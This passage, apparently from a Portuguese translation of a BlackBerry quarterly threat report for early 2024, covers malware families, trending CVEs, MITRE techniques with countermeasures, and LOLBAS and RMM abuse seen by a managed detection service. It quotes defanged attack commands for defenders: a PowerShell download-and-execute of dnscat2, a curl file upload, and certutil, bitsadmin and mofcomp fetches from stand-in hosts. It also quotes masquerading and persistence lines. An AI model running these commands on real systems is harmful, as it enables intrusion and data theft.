O malware RedLine utiliza uma ampla gama de aplicativos e serviços para exfiltrar ilicitamente os dados das vítimas, como informações de cartão de crédito, senhas e cookies.

RisePro

Infostealer

Embora variações atualizadas do RisePro tenham sido observadas em nosso último relatório, o infostealer foi visto em uma nova campanha sendo falsamente distribuído como "software crackeado" em repositórios do GitHub durante o período deste relatório.

Carregador de fumaça

Porta dos fundos

O SmokeLoader é um malware modular usado para baixar outras cargas úteis e roubar informações. Ele foi originalmente observado em 2011, mas continua sendo uma ameaça ativa até hoje.

Prometei

Minerador de criptomoedas/Botnet

O Prometei é um botnet de criptomoeda multiestágio e multiplataforma que tem como alvo principal as moedas Monero. Ele pode ajustar sua carga útil para atingir as plataformas Linux ou Windows. O Prometei foi visto sendo usado junto com o Mimikatz para se espalhar para o maior número possível de endpoints.

Buhti

Ransomware

O Buhti é uma operação de ransomware que utiliza variações existentes de outros malwares, como o LockBit ou o Babuk, para atacar sistemas Linux e Windows.

Ameaças predominantes por plataforma: Linux

XMRig

Minerador de criptomoedas

O XMRig continua a ser predominante durante o período deste relatório. O minerador tem como alvo o Monero e permite que o agente da ameaça use o sistema da vítima para minerar criptomoedas sem o seu conhecimento.

NoaBot/Mirai

Negação de serviço distribuída (DDoS)

O NoaBot é uma variante um pouco mais sofisticada do Mirai. Ele apresenta técnicas de ofuscação aprimoradas em comparação com o Mirai e usa SSH para se espalhar, em vez de Telnet. Ele também é compilado com uClibc em vez de GCC, o que dificulta a detecção.NoaBot/Mirai

XorDDoS

DDoS

Frequentemente observado em nossa telemetria, o XorDDoS é um malware de Trojan que tem como alvo dispositivos voltados para a Internet que executam o Linux e coordenam botnets infectados por meio de instruções C2. Seu nome se deve ao uso da criptografia XOR para controlar o acesso aos dados de execução e comunicação.

AcidPour

Limpador de para-brisa

Embora não esteja presente em nossa própria telemetria, uma nova versão do limpador de dados AcidPour foi vista na natureza. A versão mais recente do malware, que é utilizada para limpar arquivos em roteadores e modems, foi projetada para atingir especificamente dispositivos Linux x86.

Ameaças predominantes por plataforma: MacOS

RustDoor

Porta dos fundos

O RustDoor é um malware backdoor baseado em Rust que é distribuído principalmente disfarçado de atualizações de programas legítimos. O malware se espalha como binários FAT contendo arquivos Mach-o.

Ladrão atômico

Infostealer

O Atomic Stealer (AMOS) continua predominante com uma nova versão detectada na natureza. A versão mais recente do ladrão utiliza um script Python para ajudar a não ser detectado. O AMOS tem como alvo senhas, cookies de navegador, dados de preenchimento automático, carteiras de criptografia e dados de chaveiro do Mac.

Transferência do Império

Infostealer

Um infostealer descoberto pelo Moonlock Lab em fevereiro de 2024. Ele pode se "autodestruir" quando detecta que está sendo executado em um ambiente virtual. Isso ajuda o malware a não ser detectado e torna a análise mais difícil para os defensores. O Empire Transfer tem como alvo senhas, cookies de navegador e carteiras de criptografia, e utiliza táticas semelhantes ao Atomic Stealer (AMOS).

Ameaças predominantes por plataforma: Android

SpyNote

Infostealer/RAT

O SpyNote utiliza o Serviço de Acessibilidade do Android para capturar dados do usuário e enviar os dados capturados para um servidor C2.

Anatsa/Teabot

Infostealer

Distribuído principalmente pela loja Google Play como aplicativos de Trojan. Após a infecção inicial do aplicativo de Trojan, o Anatsa baixa arquivos maliciosos adicionais no dispositivo da vítima a partir de um servidor C2.

Vultur

Infostealer/RAT

Descoberto pela primeira vez em 2021, o Vultur foi distribuído por meio de aplicativos Trojan e técnicas de engenharia social de "smishing" (phishing por SMS). Além da exfiltração de dados, um agente de ameaças também pode fazer alterações no sistema de arquivos, modificar as permissões de execução e controlar o dispositivo infectado usando os Serviços de Acessibilidade do Android.

Coper/Octo

Infostealer/RAT

Uma variante da família Exobot. Empacotado como um produto MaaS, seus recursos incluem keylogging, monitoramento de SMS, controle de tela, acesso remoto e operação C2.

Vulnerabilidades e exposições comuns

Os CVEs (Common Vulnerabilities and Exposures, vulnerabilidades e exposições comuns) fornecem uma estrutura para identificar, padronizar e divulgar vulnerabilidades e exposições de segurança conhecidas. Conforme mencionado anteriormente, os criminosos cibernéticos estão usando cada vez mais os CVEs para violar sistemas e roubar dados. Neste período do relatório, novas vulnerabilidades encontradas nos produtos Ivanti, ConnectWise, Fortra e Jenkins ofereceram aos malfeitores novas maneiras de atingir as vítimas. Além disso, os últimos meses demonstraram os riscos de ataques à cadeia de suprimentos que podem estar presentes em projetos de código aberto com o backdoor XZ, que foi intencionalmente plantado no XZ Utils, um utilitário de compactação de dados disponível em quase todas as instalações do Linux.

Quase 8.900 novos CVEs foram relatados pelo National Institute of Standards and Technology (NIST) de janeiro a março. A pontuação básica é composta de métricas cuidadosamente calculadas que podem ser usadas para calcular uma pontuação de gravidade de zero a 10. A pontuação básica dominante do CVE foi "7", que representou 26% do total de pontuações. Isso representa um aumento de 3% para essa pontuação CVE em comparação com o último período do relatório. Até o momento, março detém o recorde de maior número de CVEs recém-descobertos neste ano, com cerca de 3.350 novos CVEs. A tabela Trending CVEs faz referência a vulnerabilidades específicas listadas no NIST National Vulnerability Database.

Figura 12: Detalhamento da gravidade do CVE.

Tendências de CVEs

XZ Utils Backdoor

CVE-2024-3094 (10 críticos)
Acesso não autorizado

Esse código malicioso foi incorporado no XZ Utils versão 5.6.0 e 5.6.1. O backdoor manipulava o sshd, o que concedia a invasores não autenticados acesso não autorizado às distribuições Linux afetadas.
 

Vulnerabilidades de dia zero do Ivanti

CVE-2024-21887 (9.1 Crítico); CVE-2023-46805 (8.2 Alto); CVE-2024-21888 (8.8 Alto); CVE-2024-21893 (8.2 Alto)
Execução de código arbitrário

No início deste ano, foram encontradas vulnerabilidades de desvio de autenticação e injeção de comando nos produtos Ivanti Connect Secure (9.x, 22.x) e Ivanti Policy Secure (9.x, 22.x). Se ambos fossem usados em conjunto por um agente de ameaças, isso permitiria que eles criassem solicitações maliciosas e executassem comandos arbitrários no sistema.

Em janeiro, a Ivanti também alertou sobre mais duas vulnerabilidades que afetam os produtos, a CVE-2024-21888 (uma vulnerabilidade de escalonamento de privilégios) e a CVE-2024-21893 (uma vulnerabilidade de falsificação de solicitação do lado do servidor). Agentes de estados nacionais exploraram essas vulnerabilidades de dia zero para implantar variedades de malware personalizadas.
 

Contorno da tela inteligente do Windows

CVE-2024-21412 (8.1 Alta)
Contorno de segurança

Esse é um desvio do recurso de segurança do arquivo de atalho da Internet que afeta os arquivos de atalho da Internet do Microsoft Windows. Ele requer a interação do usuário para contornar as verificações de segurança. Após a interação inicial, ela causa uma série de execuções que acabam levando a vítima a um script malicioso. Essa vulnerabilidade de dia zero foi usada para implantar o DarkMe RAT por um grupo de ameaças.

Vulnerabilidade de elevação do kernel do Windows

CVE-2024-21338 (7.8 Alta)
Elevação de privilégio

A exploração dessa vulnerabilidade permite que o invasor obtenha privilégios no sistema. O Lazarus Group (um grupo de ameaças norte-coreano) explorou essa vulnerabilidade de dia zero encontrada no driver do Windows AppLocker (appid.sys) para obter acesso no nível do kernel.

Exploração do GoAnywhere MFT da Fortra

CVE-2024-0204 (9.8 Crítico)
Contorno de autenticação

Em janeiro, a Fortra publicou um aviso de segurança compartilhando o bypass crítico que afeta um produto GoAnywhere MFT. Essa vulnerabilidade foi encontrada no GoAnywhere MFT da Fortra antes da versão 7.4.1. A exploração permite que um usuário não autorizado crie um usuário administrador por meio do portal de administração.

Vulnerabilidade de leitura arbitrária de arquivos no Jenkins

CVE-2024-23897 (9.7 Crítico)
Execução remota de código

As versões anteriores do Jenkins - até a 2.441 e anteriores, LTS 2.426.2 - contêm uma vulnerabilidade encontrada no sistema de arquivos do controlador do Jenkins por meio da interface de linha de comando integrada. Ela é encontrada na biblioteca args4j, que tem um recurso que substitui um caractere "@" seguido de um caminho de arquivo em um argumento pelo conteúdo do arquivo.34 Isso, por sua vez, permite que um invasor leia arquivos arbitrários no sistema de arquivos e pode levar à execução remota de código.

Vulnerabilidade do ConnectWise ScreenConnect 23.9.7

CVE-2024-1709 (10 crítico); CVE-2024-1708 (8,4 alto)
Execução remota de código

Essa vulnerabilidade afeta o produto ConnectWise ScreenConnect 23.9.7. Os invasores já foram vistos aproveitando essas duas vulnerabilidades. Ambas funcionam em conjunto, sendo que a CVE-2024-1709 (uma vulnerabilidade crítica de desvio de autenticação) permite que o invasor crie contas administrativas e explore a CVE-2024-1708 (uma vulnerabilidade de passagem de caminho), permitindo o acesso não autorizado aos arquivos e diretórios da vítima.

Técnicas comuns do MITRE

Compreender as técnicas de alto nível dos grupos de ameaças pode ajudar a decidir quais técnicas de detecção devem ser priorizadas. O site BlackBerry observou as seguintes 20 principais técnicas sendo usadas por agentes de ameaças nesse período do relatório.

Uma seta para cima na última coluna indica que o uso da técnica aumentou desde nosso último relatório; uma seta para baixo indica que o uso diminuiu , e um símbolo de igual (=) significa que a técnica permanece na mesma posição que em nosso último relatório.

Nome da técnica ID da técnica Nome da tática Último relatório Mudança
Injeção de processo
T1055
Escalonamento de privilégios, evasão de defesa
1
=
Descoberta de informações do sistema
T1082
Descoberta
3
Carregamento lateral de DLL
T1574.002
Persistência, escalonamento de privilégios, evasão de defesa
4
Captura de entrada
T1056
Acesso a credenciais, coleta
2
Descoberta de software de segurança
T1518.001
Descoberta
NA
Mascaramento
T1036
Evasão da defesa
10
Descoberta de arquivos e diretórios
T1083
Descoberta
13
Descoberta de processos
T1057
Descoberta
19
Protocolo da camada de aplicativos
T1071
Comando e controle
6
Chaves de execução do registro/Pasta de inicialização
T1547.001
Persistência, escalonamento de privilégios
9
Protocolo não relacionado à camada de aplicativos
T1095
Comando e controle
5
Descoberta remota do sistema
T1018
Descoberta
15
Descoberta da janela do aplicativo
T1010
Descoberta
NA
Embalagem de software
T1027.002
Evasão da defesa
NA
Tarefa agendada/trabalho
T1053
Execução, persistência, escalonamento de privilégios
8
Serviço do Windows
T1543.003
Persistência, escalonamento de privilégios
12
Desativar ou modificar ferramentas
T1562.001
Evasão da defesa
18
Interpretador de comandos e scripts
T1059
Execução
7
Arquivos ou informações ofuscados
T1027
Evasão da defesa
NA
Replicação por meio de mídia removível
T1091
Acesso inicial, movimento lateral
11
ID da técnica
Injeção de processo
T1055
Descoberta de informações do sistema
T1082
Carregamento lateral de DLL
T1574.002
Captura de entrada
T1056
Descoberta de software de segurança
T1518.001
Mascaramento
T1036
Descoberta de arquivos e diretórios
T1083
Descoberta de processos
T1057
Protocolo da camada de aplicativos
T1071
Chaves de execução do registro/Pasta de inicialização
T1547.001
Protocolo não relacionado à camada de aplicativos
T1095
Descoberta remota do sistema
T1018
Descoberta da janela do aplicativo
T1010
Embalagem de software
T1027.002
Tarefa agendada/trabalho
T1053
Serviço do Windows
T1543.003
Desativar ou modificar ferramentas
T1562.001
Interpretador de comandos e scripts
T1059
Arquivos ou informações ofuscados
T1027
Replicação por meio de mídia removível
T1091
Nome da tática
Injeção de processo
Escalonamento de privilégios, evasão de defesa
Descoberta de informações do sistema
Descoberta
Carregamento lateral de DLL
Persistência, escalonamento de privilégios, evasão de defesa
Captura de entrada
Acesso a credenciais, coleta
Descoberta de software de segurança
Descoberta
Mascaramento
Evasão da defesa
Descoberta de arquivos e diretórios
Descoberta
Descoberta de processos
Descoberta
Protocolo da camada de aplicativos
Comando e controle
Chaves de execução do registro/Pasta de inicialização
Persistência, escalonamento de privilégios
Protocolo não relacionado à camada de aplicativos
Comando e controle
Descoberta remota do sistema
Descoberta
Descoberta da janela do aplicativo
Descoberta
Embalagem de software
Evasão da defesa
Tarefa agendada/trabalho
Execução, persistência, escalonamento de privilégios
Serviço do Windows
Persistência, escalonamento de privilégios
Desativar ou modificar ferramentas
Evasão da defesa
Interpretador de comandos e scripts
Execução
Arquivos ou informações ofuscados
Evasão da defesa
Replicação por meio de mídia removível
Acesso inicial, movimento lateral
Último relatório
Injeção de processo
1
Descoberta de informações do sistema
3
Carregamento lateral de DLL
4
Captura de entrada
2
Descoberta de software de segurança
NA
Mascaramento
10
Descoberta de arquivos e diretórios
13
Descoberta de processos
19
Protocolo da camada de aplicativos
6
Chaves de execução do registro/Pasta de inicialização
9
Protocolo não relacionado à camada de aplicativos
5
Descoberta remota do sistema
15
Descoberta da janela do aplicativo
NA
Embalagem de software
NA
Tarefa agendada/trabalho
8
Serviço do Windows
12
Desativar ou modificar ferramentas
18
Interpretador de comandos e scripts
7
Arquivos ou informações ofuscados
NA
Replicação por meio de mídia removível
11
Mudança
Injeção de processo
=
Descoberta de informações do sistema
Carregamento lateral de DLL
Captura de entrada
Descoberta de software de segurança
Mascaramento
Descoberta de arquivos e diretórios
Descoberta de processos
Protocolo da camada de aplicativos
Chaves de execução do registro/Pasta de inicialização
Protocolo não relacionado à camada de aplicativos
Descoberta remota do sistema
Descoberta da janela do aplicativo
Embalagem de software
Tarefa agendada/trabalho
Serviço do Windows
Desativar ou modificar ferramentas
Interpretador de comandos e scripts
Arquivos ou informações ofuscados
Replicação por meio de mídia removível

Usando o MITRE D3FEND™, a equipe de Pesquisa e Inteligência de Ameaças do BlackBerry desenvolveu uma lista completa de contramedidas para as técnicas observadas durante esse período de relatório, que está disponível em nosso GitHub público.

As três principais técnicas são procedimentos bem conhecidos usados pelos adversários para coletar informações importantes para realizar ataques bem-sucedidos. A seção Applied Countermeasures contém alguns exemplos de seu uso e algumas informações úteis para monitorar.

O impacto do total de técnicas e táticas pode ser visto no gráfico abaixo:

Figura 13: Técnicas observadas do MITRE ATT&CK®.

A tática mais predominante nesse período do relatório é a Evasão da Defesa, que representa 24% do total de táticas observadas durante esse período, seguida por Descoberta , com 23%, e Escalonamento de Privilégios, com 21%.
Figura 14: Táticas observadas da MITRE ATT&CK.

Contramedidas aplicadas para técnicas MITRE conhecidas

A equipe de pesquisa e inteligência do site BlackBerry analisou cinco técnicas MITRE observadas nesse período:

  • Descoberta de software de segurança - T1518.001

    Essa técnica popular permite que os agentes de ameaças cibernéticas encontrem a lista de programas de segurança, configurações e sensores instalados em um sistema ou ambiente de nuvem visado. Isso é muito importante para um adversário que espera não ser detectado. Por exemplo, se um grupo mal-intencionado executar um dos comandos listados abaixo em um sistema comprometido e detectar que o ambiente já tem segurança para detectar atividades mal-intencionadas, ele geralmente abortará a operação. Em outros casos, grupos mais avançados e persistentes podem diferenciar os aplicativos de segurança e encontrar uma maneira de contornar os aplicativos mais fracos. Isso pode fazer com que um adversário obtenha o controle de um sistema ou ambiente de nuvem.

    Abaixo estão as linhas de comando que um invasor pode usar para avaliar sua segurança:

    • netsh firewall show
    • despejo de interface netsh.exe
    • findstr /s /m /i "defender" *.*
    • Lista de tarefas /v
    • Módulo do Império Powershell Get-AntiVirusProduct
    • cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

  • Mascaramento - T1036

    Essa é uma tática sofisticada de ameaça cibernética empregada pelos atacantes para disfarçar suas atividades e evitar a detecção. Por exemplo, ao usar um nome, ícone e metadados falsos, as ações prejudiciais podem ser facilmente disfarçadas como operações padrão do sistema. Mascarar-se como um arquivo ou processo legítimo pode induzir os usuários e o software de segurança a abrir ou salvar um arquivo falso, o que pode levar à penetração do sistema e à perda de dados. (Encontre detalhes sobre como identificar um método de mascaramento em nossa seção CylanceMDR Observations deste relatório).

    Aqui está um detalhamento dos métodos comuns de mascaramento:

    • Renomeação de executáveis: Os atacantes geralmente renomeiam os executáveis mal-intencionados para fingir que são um programa legítimo do sistema (por exemplo, svchost.exe, explorer.exe) e podem alterar ou adicionar outra extensão falsa para ocultar o tipo de arquivo real, como .txt.doc ou .exe.config. O objetivo é enganar os usuários e as ferramentas de segurança durante a execução de verificações manuais ou automáticas do sistema, para que o usuário execute ou tente abrir o arquivo malicioso sem dar atenção aos avisos do sistema.
    • Imitação de caminhos de arquivos: Em um diretório comumente confiável (por exemplo, System32), há menos observação e detecção por parte das ferramentas de segurança. Por esse motivo, os invasores geralmente colocam arquivos mal-intencionados nesses diretórios e dão a eles nomes de processos legítimos para ocultá-los.
    • Assinatura de código inválida: Os atacantes podem assinar seu malware com certificados digitais inválidos ou roubados para contornar as medidas de segurança. Isso induz os sistemas e os usuários a confiarem em arquivos ou processos mal-intencionados, fazendo-os parecer que foram verificados por uma fonte legítima. Os invasores podem usar certificados expirados, revogados ou obtidos de forma fraudulenta. A identificação dessas táticas exige processos robustos de validação de certificados e sistemas de alerta que possam sinalizar dados incomuns de certificados ou validações com falha. Por exemplo, para mascarar o cmd.exe como um aplicativo de calculadora:
      Copie c:\windows\system32\cmd.exe C:\calc.exe

  • Descoberta de arquivos e diretórios - T1083

    A descoberta de arquivos e diretórios é frequentemente utilizada durante o estágio de reconhecimento de um invasor para obter informações sobre o ambiente-alvo, identificar possíveis arquivos para exfiltração ou manipulação, localizar informações confidenciais ou dar suporte a outros estágios de uma cadeia de ataque.

    As linhas de comando a seguir são usadas para essa técnica:

    • 'dir /s C:\path\to\directory' - Utiliza o utilitário dir para listar recursivamente arquivos e diretórios em um determinado diretório e seus subdiretórios.
    • 'tree /F' - Usa o utilitário tree para exibir os nomes de arquivos em cada diretório junto com a árvore de diretórios.
    • 'powershell.exe -c "Get-ChildItem C:\path\to\directory"' - Implementa o cmdlet Get-ChildItem no powershell, que recupera uma lista de arquivos e diretórios no caminho especificado.

    Os agentes de ameaças também podem usar funções nativas da API do Windows para enumerar arquivos e diretórios. Veja a seguir as funções da API do Windows usadas pelos agentes de ameaças:

    • FindFirstFile - Recupera informações sobre o primeiro arquivo ou diretório que corresponde ao padrão de nome de arquivo ou diretório especificado.
    • FindNextFile - Continua uma pesquisa de arquivo iniciada por uma chamada anterior à função FindFirstFile.
    • PathFileExists - Verifica se um diretório ou arquivo especificado existe.

  • Protocolo da camada de aplicativos - T1071

    Os agentes de ameaças estão constantemente buscando novas maneiras de ocultar suas ações no tráfego legítimo para evitar a detecção. A manipulação do protocolo da camada de aplicativos (T1071) é uma técnica popular. Durante os três primeiros meses de 2024, essa técnica surgiu como uma das cinco principais táticas empregadas por agentes mal-intencionados. Explorando vulnerabilidades em protocolos de rede comumente usados, como HTTP, HTTPS, DNS ou SMB, os adversários podem misturar a atividade mal-intencionada perfeitamente ao tráfego de rede de rotina.

    Essa técnica pode ser usada para exfiltrar dados, permitir a comunicação C2 e mover-se lateralmente em redes comprometidas. Por exemplo, os adversários podem codificar dados confidenciais em cabeçalhos HTTP ou aproveitar o tunelamento de DNS para contornar as defesas da rede e extrair informações sem levantar suspeitas. A natureza furtiva da manipulação do protocolo da camada de aplicativos apresenta desafios significativos para a detecção e a atribuição, pois muitas ferramentas de segurança tradicionais têm dificuldade para diferenciar entre atividades de rede normais e mal-intencionadas.

    Dada a prevalência e a sofisticação dessa técnica, as organizações devem adotar medidas proativas para reforçar suas defesas. Uma solução robusta de monitoramento de rede deve ser capaz de detectar padrões de tráfego anômalos e garantir que o comportamento suspeito associado à manipulação do protocolo da camada de aplicativos seja diferenciado com precisão da atividade rotineira do usuário.

    Além disso, a manutenção de patches de segurança atualizados para protocolos e aplicativos de rede pode atenuar vulnerabilidades e explorações conhecidas. Ao implementar soluções de detecção e resposta de endpoints (EDR), as organizações podem melhorar sua capacidade de identificar e responder a atividades mal-intencionadas perpetradas por meio da manipulação do protocolo da camada de aplicativos, reforçando assim sua postura geral de segurança cibernética.

    A seguir estão os comandos APL usados por agentes de ameaças: curl -F "file=@C:\Users\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
    powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1'

  • Chaves de execução do registro / Pasta de inicialização - T1547.001

    A manipulação das chaves de execução do registro/pasta de inicialização é uma técnica usada pelos adversários para estabelecer a persistência em sistemas comprometidos. Essa técnica foi destaque entre as principais táticas utilizadas pelos agentes de ameaças cibernéticas no período do relatório. Ao adulterar as chaves do Registro do Windows ou adicionar entradas mal-intencionadas às pastas de inicialização, os adversários garantem que suas cargas mal-intencionadas sejam executadas automaticamente na inicialização do sistema ou no login do usuário, facilitando o controle contínuo sobre os sistemas comprometidos.

    Essa técnica permite que os adversários implantem uma ampla variedade de malware, incluindo backdoors, keyloggers e ransomware, mantendo assim o acesso persistente aos sistemas comprometidos. Os adversários exploram as funcionalidades nativas do Windows para evitar a detecção. O abuso de configurações legítimas do sistema torna a detecção e a atenuação dessas ameaças mais desafiadoras para as soluções AV tradicionais.

    Para combater a ameaça representada pela manipulação das chaves de execução do registro e das pastas de inicialização, as organizações devem adotar uma abordagem em várias camadas para a segurança dos endpoints:

    • Monitore e audite regularmente as chaves do Registro do Windows e as pastas de inicialização para detectar alterações não autorizadas indicativas de atividade mal-intencionada.
    • Implemente a lista branca de aplicativos para ajudar a evitar executáveis não autorizados.
    • Defina controles de gerenciamento de privilégios para restringir a capacidade dos adversários de manipular as configurações essenciais do sistema.
    • Conduza programas de educação e conscientização de usuários para capacitar os funcionários a reconhecer e relatar itens de inicialização suspeitos ou modificações no registro.
    • Aprimorar os recursos gerais de detecção e resposta a ameaças.

    Alguns comandos que devem ser observados incluem:

        REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
    echo "" > "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\file[.]txt"

CylanceMDR Dados

Esta seção do relatório destaca várias das detecções de ameaças mais comuns observadas nos ambientes dos clientes do CylanceMDR .

CylanceMDRanteriormente conhecido como CylanceGUARD®, é um serviço de detecção e resposta gerenciada (MDR) baseado em assinatura da BlackBerry que fornece monitoramento 24 horas por dia, 7 dias por semana, e ajuda as organizações a impedir ameaças cibernéticas sofisticadas que exploram lacunas nos programas de segurança do cliente. A equipe do CylanceMDR rastreou milhares de alertas durante o período do relatório. Abaixo, dividimos a telemetria por região para fornecer mais informações sobre o cenário atual de ameaças.

Figura 15: Os cinco principais alertas por região.

CylanceMDR Observações

Neste período do relatório, a equipe do CylanceMDR observou que o Certutil gerou muitas atividades de detecção no centro de operações de segurança (SOC), ou seja, a técnica relacionada a ferramentas de renomeação como o Certutil (por exemplo: 'Possible Certutil Renamed Execution'). Houve um pico de detecções relacionadas a isso em todas as regiões geográficas onde o BlackBerry protege os clientes.

Em nosso relatório anterior, discutimos como os utilitários LOLBAS (living-off-the-land binaries and scripts), como o Certutil, são abusados ou mal utilizados pelos agentes de ameaças: eles geralmente renomeiam utilitários legítimos (como o Certutil) em uma tentativa de evitar os recursos de detecção. Isso é conhecido como masquerading e tem o ID de técnica MITRE: T1036.003. Os defensores devem implementar recursos de detecção robustos para minimizar o risco de técnicas de evasão, como o masquerading. Por exemplo, a criação de uma regra de detecção que só é acionada quando o comando Certutil é exibido (juntamente com todas as opções/argumentos usados indevidamente com essa ferramenta) pode ser facilmente evitada.

Veja os dois comandos abaixo, por exemplo:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

Se os seus recursos de detecção dependerem apenas da visualização do comando certutil (juntamente com suas opções), isso será detectado, mas considerado uma proteção fraca, pois pode ser facilmente evitada.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt

Nesse caso, renomeamos o certutil.exe para outlook.exe e isso evitaria completamente a detecção (se estivermos usando a lógica discutida acima).

Uma solução melhor seria garantir que os metadados do arquivo/processo executável portátil (PE), como o nome do arquivo original (o nome do arquivo interno fornecido no momento da compilação), sejam coletados e integrados aos recursos de detecção. Uma incompatibilidade entre o nome do arquivo no disco e os metadados PE do binário é um bom indicador de que um binário foi renomeado após o tempo de compilação.

Atividade LOLBAS

Durante o período do relatório, notamos uma mudança na atividade do LOLBAS observada nos ambientes de nossos clientes:

  • Aumento nas detecções relacionadas ao regsvr32.exe.
  • Diminuição da atividade relacionada ao mshta.exe.
  • Um grande aumento nas detecções relacionadas ao bitsadmin.exe.
Figura 16: LOLBAS detectado por CylanceMDR.


A seguir, um exemplo de uso malicioso do LOLBAS (excluindo aqueles que foram compartilhados durante o último período do relatório).

Arquivo: Bitsadmin.exe
Mitre: T1197 | T1105
Como ele pode ser abusado: 

  • Download/upload de ou para um host malicioso (transferência de ferramenta Ingress)
  • Pode ser usado para executar processos maliciosos

Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest


Arquivo: mofcomp.exe
Mitre: T1218
Como ele pode ser abusado: 

  • Pode ser usado para instalar scripts maliciosos de formato de objeto gerenciado (MOF)
  • As instruções MOF são analisadas pelo utilitário mofcomp.exe e adicionam as classes e as instâncias de classe definidas no arquivo ao repositório WMI

Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

As ferramentas de monitoramento e gerenciamento remoto (RMM) são usadas com frequência pelos provedores de serviços gerenciados de TI (MSPs) para monitorar remotamente os endpoints dos clientes. Infelizmente, as ferramentas de RMM também permitem que os agentes de ameaças acessem esses mesmos sistemas. Essas ferramentas oferecem uma série de recursos de administração e proporcionam uma maneira de o agente da ameaça se misturar usando ferramentas confiáveis e aprovadas.

Em 2023, o abuso da ferramenta RMM foi um ponto focal devido a relatórios relacionados ao Scattered Spider, um grupo de ataque cibernético que se acredita estar por trás dos ataques ao MGM Resorts International em setembro de 2023. Os membros do Scattered Spider são considerados especialistas sofisticados em engenharia social e utilizam várias técnicas, como ataques de troca de SIM, phishing e push bombing. Eles usaram uma série de ferramentas de RMM durante seus ataques, como:

  • Splashtop
  • TeamViewer
  • ScreenConnect

A partir do primeiro período de relatório em 2024, a atenção sobre as ferramentas de RMM permaneceu alta desde a descoberta de duas vulnerabilidades no ConnectWise ScreenConnect (todas as versões abaixo da 23.9.8). Os detalhes do CVE podem ser vistos abaixo:

CVE-2024-1709

CWE-288: desvio de autenticação usando um caminho ou canal alternativo.

CVE-2024-1708

CWE-22: limitação inadequada de um nome de caminho para um diretório restrito ("path traversal").

O gráfico abaixo ilustra as ferramentas de RMM mais comuns observadas durante o período do relatório.

Figura 17: Ferramentas de RMM encontradas em CylanceMDR.


Durante nossa análise, observamos que muitos clientes usam várias ferramentas de RMM, aumentando a superfície de ataque e o risco da organização. As atenuações sugeridas incluem:

Auditoria de ferramentas de acesso remoto (ferramentas RMM)

  • Identificar as ferramentas de RMM usadas atualmente no ambiente.
  • Confirme se eles são aprovados no ambiente.
  • Se estiver usando várias ferramentas de RMM, determine se elas podem ser consolidadas. A redução do número de diferentes ferramentas utilizadas reduz o risco.

Desativar portas e protocolos

  • Bloqueie a comunicação de rede de entrada e saída para portas comumente usadas associadas a ferramentas de acesso remoto não aprovadas.

Auditar rotineiramente os registros

  • Detectar o uso anormal de ferramentas de acesso remoto.

Patching

  • Garantir a revisão regular das vulnerabilidades associadas às ferramentas de RMM utilizadas, atualizando-as conforme necessário.
  • Os softwares acessíveis pela Internet, como as ferramentas de RMM, devem sempre ter alta prioridade ao realizar ciclos regulares de patches. 

Segmentação de rede

  • Minimize o movimento lateral segmentando a rede e limitando o acesso a dispositivos e dados.

Marcação de dispositivos

  • Descubra se o seu fornecedor de segurança oferece opções para marcar dispositivos que usam ferramentas de RMM. Em caso afirmativo, ative essa opção para garantir que o SOC tenha visibilidade. Alguns fornecedores oferecem opções para deixar uma nota/etiqueta identificando as ferramentas/atividades aprovadas, o que ajuda muito os analistas durante as investigações.

RMM de carregamento de memória

  • Use um software de segurança que possa detectar acessos remotos que são carregados apenas na memória.

Conclusão

Esse relatório de 90 dias foi criado para ajudá-lo a se manter informado e preparado para ameaças futuras. Ao lidar com um cenário de ameaças à segurança cibernética que muda rapidamente, é útil manter-se atualizado com as últimas notícias sobre segurança para o seu setor, região geográfica e questões importantes. Aqui estão nossas principais conclusões de janeiro a março de 2024:

  • Globalmente, o BlackBerry interrompeu 37.000 ataques por dia direcionados aos nossos locatários, de acordo com nossa telemetria interna Attacks Stopped. Observamos um grande aumento no número de malwares exclusivos direcionados aos nossos locatários e clientes, um aumento de 40% por minuto em relação ao período do relatório anterior. Isso pode sugerir que os agentes de ameaças estão tomando medidas abrangentes para atingir cuidadosamente suas vítimas.
  • Os infostealers se destacaram em nossas seções Infraestrutura crítica, Empresa comercial e Principais ameaças. Isso sugere que dados confidenciais e privados são altamente procurados por agentes de ameaças em todas as regiões geográficas e setores.
  • Conforme destacado em nossa nova Seção de Ransomware, que descreve os grupos de ransomware mais notáveis, o ransomwareestá cada vez mais voltado para infraestruturas críticas, principalmente na área da saúde.
  • A exploração de CVEs expandiu-se rapidamente no último ano e continuará. O site BlackBerry registrou quase 9.000 novos CVEs divulgados pelo NIST nos últimos três meses. Além disso, mais de 56% dessas vulnerabilidades divulgadas obtiveram pontuação superior a 7,0 em termos de criticidade. As explorações relacionadas a softwares legítimos muito utilizados, como o ConnectWise ScreenConnect, GoAnywhere e vários produtos Ivanti genuínos, foram transformadas em armas por agentes de ameaças em um ritmo alarmante para fornecer uma série de malwares a máquinas de vítimas sem patches.
  • Os enganos políticos por meio de deepfakes e desinformação estão se espalhando cada vez mais pelas mídias sociais e continuarão a ser um problema no futuro, principalmente em relação à invasão russa da Ucrânia, ao conflito em andamento no Oriente Médio e à próxima eleição presidencial dos EUA, que ocorrerá em novembro.

Mais informações sobre as principais ameaças e defesas de segurança cibernética podem ser encontradas no blogBlackBerry .

Agradecimentos

Este relatório representa os esforços de colaboração de nossas equipes e indivíduos talentosos. Em especial, gostaríamos de reconhecer:

Apêndice: Ameaças à infraestrutura crítica e às empresas comerciais

8Base ransomware: Um grupo de ransomware particularmente agressivo visto pela primeira vez em 2023. Ele tem sido extremamente ativo em seu curto histórico, geralmente visando vítimas na América do Norte e em países da América Latina. O grupo de ameaças utiliza uma combinação de táticas para obter acesso inicial e, em seguida, também pode explorar vulnerabilidades nos sistemas da vítima para maximizar seu possível pagamento.

